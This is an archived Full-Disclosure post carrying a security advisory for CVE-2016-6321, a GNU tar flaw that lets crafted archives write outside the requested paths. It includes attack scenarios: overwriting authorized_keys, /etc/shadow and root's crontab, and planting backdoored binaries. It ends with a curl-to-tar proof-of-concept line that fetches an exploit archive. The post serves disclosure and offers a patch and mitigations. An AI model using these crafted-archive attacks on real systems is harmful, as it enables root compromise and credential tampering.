lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 27 Oct 2016 00:46:02 +0300 (EEST)
From: Harry Sintonen <fulldisclosure@...er.fi>
To: fulldisclosure@...lists.org
Subject: [FD] [CSS] POINTYFEATHER / tar extract pathname bypass
	(CVE-2016-6321)

---------------- t2'16 special vulnerability release -----------------


         Vulnerability: POINTYFEATHER aka Tar extract pathname bypass
         Credits: Harry Sintonen / FSC1V Cyber Security Services
         Date: 2016-10-27
         Impact: File overwrite in certain situations
         Classifier: Full spectrum cyber
         CVSS: 4.3.2
         Threat level: Manatee

         //NORDIC EYES ONLY//NOFORN//PUBLIC//EXPLOIT GLOBAL//

         In a time when 0days are hoarded and exchanged for
         local currencies in different parts of the world,
         F-Secure CSS is going old-school and dropping a
         not-so-valuable vulnerability, for free as in beer.

         Tar will happily extract files & directories into
         an arbitrary location when supplied with a suitably
         crafted archive file. If a target system is extracting
         an attacker supplied file, the vulnerability can
         be exploited to gain file overwrite capability.

         We have exploited this vulnerability in environments
         where tar was run as root to gain root access on the
         target. In most scenarios this is a non-issue, however
         as we have witnessed, corner cases can be quite
         useful.

         After the communication with different parties was
         discontinued for more than 42 days, the decision was
         made to proceed with our honorable disclosure policy.

         Greets to our Swedish friends olleb, Linus, Daniel W,
         Ludde - see you at t2!


                `;+####',       .;####':`       .;####':`
             `#@@@@@@@@@@@,   ;@@@@@@@@@@#    ;@@@@@@@@@@#
            +@@@@@@@@@@@@@,  +@@@@@@@@@@@#   +@@@@@@@@@@@#
           #@@@@@#.    .+@,  @@@@@`    ,##   @@@@@`    ,##
          :@@@@@,         `  @@@@@:          @@@@@:
          #@@@@#             #@@@@@@@@'.     #@@@@@@@@'.
          @@@@@:              #@@@@@@@@@@;    #@@@@@@@@@@;
          #@@@@+                ;#@@@@@@@@'     ;#@@@@@@@@'
          '@@@@@`                   `#@@@@@         `#@@@@@
           @@@@@@;      `'#  #;      `@@@@@  #;      `@@@@@
           `@@@@@@@@@@@@@@#  #@@@@##@@@@@@+  #@@@@##@@@@@@+
             ;@@@@@@@@@@@@#  #@@@@@@@@@@@+   #@@@@@@@@@@@+
               .+@@@@@@@#:    :#@@@@@@#:      :#@@@@@@#:

            Denmark · Finland · Poland · Sweden · Norway
                 Cyber Industrial Complex since '07

-----------------------------------------------------------------------


CVE-2016-6321 - GNU tar extract pathname bypass
===============================================
The latest version of this advisory is available at:
https://sintonen.fi/advisories/tar-extract-pathname-bypass.proper.txt


Overview
--------

GNU `tar' archiver can be tricked into extracting files and 
directories in the given destination, regardless of the path 
name(s) specified on the command line.


Description
-----------

GNU `tar' archiver attempts to avoid path traversal attacks 
by removing offending parts of the element name at extract. 
This sanitizing leads to a vulnerability where the attacker 
can bypass the path name(s) specified on the command line.


Impact
------

The attacker can create a crafted tar archive that, if 
extracted by the victim, replaces files and directories 
the victim has access to in the target directory, regardless 
of the path name(s) specified on the command line.


Details
-------

The discovered vulnerability, described in more detail below, 
enables file and directory overwrite attacks against the user 
or system by using a crafted tar archive. The attack requires 
that the victim or system extract the crafted tar archive prepared 
by the attacker. Automated systems extracting paths from archives 
originating from untrusted sources are in particular danger, 
especially if the extract operation is performed with elevated 
privileges.

In the worst-case scenario this vulnerability can lead to a full 
system compromise (remote code execution as root).


1. Extract pathname bypass due to safer_name_suffix usage

lib/paxnames.c safer_name_suffix() function sanitizes the `file_name' 
parameter and removes the file system prefix from the name if 
`absolute_names' parameter is 0. As a result, the path name 
effectively becomes relative to the target directory, ignoring the 
path name given on the command line.


The history of this bug is somewhat complicated:

- Before 13.12.1999 commit it was possible to extract entries
   with member names containing ".." sequence(s).
- On 13.12.1999 commit the code was changed[1] to warn about
   and skip member names that had ".." sequence(s):
   `(extract_archive): By default, warn about ".." in member
   names, and skip them.'
- However on 05.07.2003 the code was changed[2] to use
   `safer_name_suffix' function:
   `(extract_archive): Use safer_name_suffix rather than rolling
    our own.'

The unfortunate side effect of the 05.07.2003 change was that 
rather than skipping the entries with malicious member names with 
".." in them, the code would now attempt to make the malicious name
safe. Making the name safe involves stripping all offending path 
components, thus resulting the target name being relative to the 
target directory root, regardless of the requested path name.

Here is a number of practical attack scenarios:

- Attack the user by replacing important files, such as
   .ssh/authorized_keys, .bashrc, .bash_logout, .profile,
   .subversion or .anyconnect, when they extract an tar archive.
    For example:

   user@...t:~$ dpkg --fsys-tarfile evil.deb | tar -xf - \
   --wildcards 'blurf*'
   tar: Removing leading `blurf/../' from member names
   user@...t:~$ cat .ssh/authorized_keys
   ssh-rsa AAAAB3...nU= mrrobot@...ciety
   user@...t:~$


- Attack automation that extracts tar originating from a web
   application or similar sources. Such operation might be performed by
   a setuid root component of the application. The command executed
   could be for example:

   #tar -C / -zxf /tmp/tmp.tgz etc/application var/chroot/application/etc

   The attacker can overwrite /var/spool/cron/crontabs/root to gain code
   execution as root. It is also possible to replace binaries commonly
   executed by root with a backdoored ones, or to drop setuid root
   binaries that will enable the attacker to gain root privileges at
   will. Common attack would be to replace some network facing daemon
   with backdoored one, enabling covert code execution on demand.

   This type of scenario has been successfully exploited in the real
   world to gain a remote code execution as root in different
   environments.

- Attack commands that try to replace single files/dirs as root:

   The victim would like to replace `/etc/motd' file in the system by
   extracting it from an archive obtained from an untrusted source:

   # tar -C / -xvf archive.tar etc/motd
   tar: Removing leading `etc/motd/../' from member names
   etc/motd/../etc/shadow
   #

   The attacker can also bypass --exclude rule, if it is being used
   with --anchored switch. For example: The victim would like to extract
   all files but `/etc/shadow' from an archive:

   # tar -C / -xvf archive.tar --anchored --exclude etc/shadow
   tar: Removing leading `etc/motd/../' from member names
   etc/motd/../etc/shadow
   #

   In both cases, the attacker has now successfully replaced /etc/shadow
   file with arbitrary content.


Exploiting the vulnerability works best if the attacker has some prior 
knowledge of the specifics of the tar command line that gets executed. 
The path prefix before the `..' sequence will need to (at least 
partially) match the target path (or not match in case of the exclude 
rule) in order for the bypass attack to work. Guessing which paths 
the victim might extract could work too, but the success rate is 
likely lower.


Vulnerable versions
-------------------

- GNU tar 1.14 to 1.29 (inclusive)

Affected operating systems
--------------------------

Red Hat
Alpine Linux
Red Star OS
...
any other Linux using GNU tar


Recommended changes to GNU tar
------------------------------

1. Skip entries with member names containing a '..', or fail the whole
    tar extract operation. A proposed patch that mitigates the issue:

    https://sintonen.fi/advisories/tar-extract-pathname-bypass.patch

    While this patch applies to GNU paxutils, it should only be applied
    to version being used in `tar', not paxutils itself. Patching the
    paxutils itself would likely break excepted GNU `cpio'
    functionality.


End user mitigation
-------------------

1. If your OS distribution offers a fixed GNU tar version, install it

or

2. Only extract untrusted tar archives to a temporary directory in
    virtual machine

or

3. Prohibit full spectrum cyber operations in your enterprise.


Proof-of-concept
----------------

$ curl https://sintonen.fi/advisories/tar-poc.tar | tar xv etc/motd
$ cat etc/shadow


References
----------

[1] http://git.savannah.gnu.org/cgit/tar.git/commit/src/
     extract.c?id=6e9d1539b665c8f3c173b36702ca1650cac977ad
[2] http://git.savannah.gnu.org/cgit/tar.git/commit/src/
     extract.c?id=675c5a2f243bb5e72c982c0e3c30762ec32e9a1b


Timeline
--------

10.03.2016  discovered the vulnerability
11.03.2016  wrote a preliminary advisory
11.03.2016  contacted the GNU tar maintainer for a PGP key
14.03.2016  revised the advisory with --anchored --exclude bypass
             information
15.03.2016  reworked the advisory slightly
15.03.2016  sent the advisory to the GNU tar maintainer
16.03.2016  contacted secalert@...hat.com for help in coordination
17.03.2016  added end user mitigation via --one-top-level to the
             advisory
17.03.2016  GNU tar maintainer didn't consider this to be an issue.
             as a result mitigation in upstream GNU tar appears
             unlikely
23.03.2016  added more attack scenarios to the advisory
10.08.2016  reworked the advisory slightly
10.08.2016  polled secalert@...hat.com regarding the status of the
             coordination
11.08.2016  CVE-2016-6321 was assigned to the vulnerability
15.09.2016  polled secalert@...hat.com regarding the status of the
             coordination
26.10.2016  handcrafted the ascii release file at a lobby bar
27.10.2016  public release of the advisory at t2'16

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists